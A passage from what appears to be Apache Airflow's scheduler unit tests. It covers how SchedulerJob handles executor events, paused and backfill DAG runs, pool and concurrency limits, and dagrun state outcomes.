dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id='dummy1')
task2 = DummyOperator(dag=dag, task_id='dummy2')
task3 = DummyOperator(dag=dag, task_id='dummy3')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dag_run = scheduler.create_dag_run(dag)
ti1 = TI(task1, dag_run.execution_date)
ti2 = TI(task2, dag_run.execution_date)
ti3 = TI(task3, dag_run.execution_date)
ti1.state = State.RUNNING
ti2.state = State.QUEUED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(
2,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING], session=session
)
)
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(
3,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING, State.QUEUED], session=session
)
)
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
@unittest.skipUnless("INTEGRATION" in os.environ,
"The test is flaky with nondeterministic result")
def test_change_state_for_tis_without_dagrun(self):
dag1 = DAG(dag_id='test_change_state_for_tis_without_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag1, owner='airflow')
DummyOperator(task_id='dummy_b', dag=dag1, owner='airflow')
dag2 = DAG(dag_id='test_change_state_for_tis_without_dagrun_dont_change', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag2, owner='airflow')
dag3 = DAG(dag_id='test_change_state_for_tis_without_dagrun_no_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag3, owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEqual(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# why o why
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_change_state_for_tasks_failed_to_execute(self):
dag = DAG(
dag_id='dag_id',
start_date=DEFAULT_DATE)
task = DummyOperator(
task_id='task_id',
dag=dag,
owner='airflow')
# If there's no left over task in executor.queued_tasks, nothing happens
session = settings.Session()
scheduler_job = SchedulerJob()
mock_logger = mock.MagicMock()
test_executor = TestExecutor()
scheduler_job.executor = test_executor
scheduler_job._logger = mock_logger
scheduler_job._change_state_for_tasks_failed_to_execute()
mock_logger.info.assert_not_called()
# Tasks failed to execute with QUEUED state will be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
key = 'dag_id', 'task_id', DEFAULT_DATE, 1
test_executor.queued_tasks[key] = 'value'
ti = TI(task, DEFAULT_DATE)
ti.state = State.QUEUED
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti.state)
# Tasks failed to execute with RUNNING state will not be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
ti.state = State.RUNNING
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
scheduler = SchedulerJob(num_runs=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@parameterized.expand([
[State.UP_FOR_RETRY, State.FAILED],
[State.QUEUED, State.NONE],
[State.SCHEDULED, State.NONE],
[State.UP_FOR_RESCHEDULE, State.NONE],
])
def test_execute_helper_should_change_state_for_tis_without_dagrun(
self, initial_task_state, expected_task_state):
session = settings.Session()
dag = DAG(
'test_execute_helper_should_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
# Create DAG run with FAILED state
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.FAILED,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = initial_task_state
session.commit()
# Create scheduler and mock calls to processor. Run duration is set
# to a high value to ensure loop is entered. Poll interval is 0 to
# avoid sleep. Done flag is set to true to exist the loop immediately.
scheduler = SchedulerJob(num_runs=0, processor_poll_interval=0)
executor = TestExecutor()
executor.queued_tasks
scheduler.executor = executor
processor = mock.MagicMock()
processor.harvest_simple_dags.return_value = [dag]
processor.done = True
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, expected_task_state)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGS.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite haveing an unfinished task.
with create_session() as session:
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
with create_session() as session:
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > datetime.datetime.utcnow())
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# zero tasks ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
session.commit()
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there
# That behavior still exists, but now it will only do so if after the
# start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=1)
scheduler.run()
# still one task
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
session.commit()
def test_scheduler_task_start_date(self):
"""
Test that the scheduler respects task start dates that are different
from DAG start dates
"""
dag_id = 'test_task_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id,
subdir=os.path.join(TEST_DAG_FOLDER, 'test_scheduler_dags.py'),
num_runs=2)
scheduler.run()
session = settings.Session()
tiq = session.query(TI).filter(TI.dag_id == dag_id)
ti1s = tiq.filter(TI.task_id == 'dummy1').all()
ti2s = tiq.filter(TI.task_id == 'dummy2').all()
self.assertEqual(len(ti1s), 0)
self.assertEqual(len(ti2s), 2)
for t in ti2s:
self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
